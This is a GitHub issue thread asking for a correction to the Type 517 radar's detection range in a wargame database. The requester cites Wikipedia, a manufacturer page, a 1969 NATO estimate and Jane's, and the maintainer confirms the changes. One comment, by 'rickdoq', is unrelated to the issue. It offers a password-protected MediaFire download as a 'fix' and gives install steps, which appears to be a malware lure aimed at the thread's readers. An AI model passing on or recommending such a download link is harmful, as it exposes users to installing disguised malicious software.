### ISSUE TITLE
Correction to Type 517 radar

### ISSUE THREAD

**Issue by CV60LCC19** [PygmalionOfCyprus/cmo-db-requests#5008]
### DB Selector

Both

### Affected DBID(s)

CWDB: Sensor_ 935; DB3K Sensor_2110

### Summary of Changes

Range is given in database as 110 nm.  According to Wikipedia, citing WUHAN JOHO TECHNOLOGY CO., LTD webpage the range is 350km (189 nm) against 4m2 RCS target; 100km (54 nm) against 0.1m2 RCS Stealth aircraft.  Of note, in 1968 NATO estimated the predecessor KNIFE REST B to hav
![NATO Current Soviet Electronic Equipment Landbased-dtd 1969](https://github.com/user-attachments/assets/d6cbc2c8-9281-4391-a372-fc3d463645cf)
e a range of 135 nm against a "medium sized bomber"(attached at pg IA-19), which the 2002 Jane's appears to concur with (attached) so an increase in range from 110 nm seems to be justified.
![Jane's P-10 radar](https://github.com/user-attachments/assets/f2a04c00-3383-478b-8548-90007deff330)

### Sources

https://en.wikipedia.org/wiki/Type_517_radar
https://www.eo-irsystems.com/sale-7838642-high-accuracy-air-land-surveillance-radar-system-of-long-range-detection.html
NATO Current Soviet Electronic Equipment Landbased-dtd 1969 (attached as .pdf)
Janes Electronic Warfare "P-10" (attached as .pdf)

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by PygmalionOfCyprus** [comment]
Made changes to the Knife Rest B in DB3K and CWDB. I think Wikipedia and the linked sources are actually referring to the Type 517H-1, which we had mostly correctly modelled in the DB. Made some tweaks to bring it in line though. 

Handled 509.
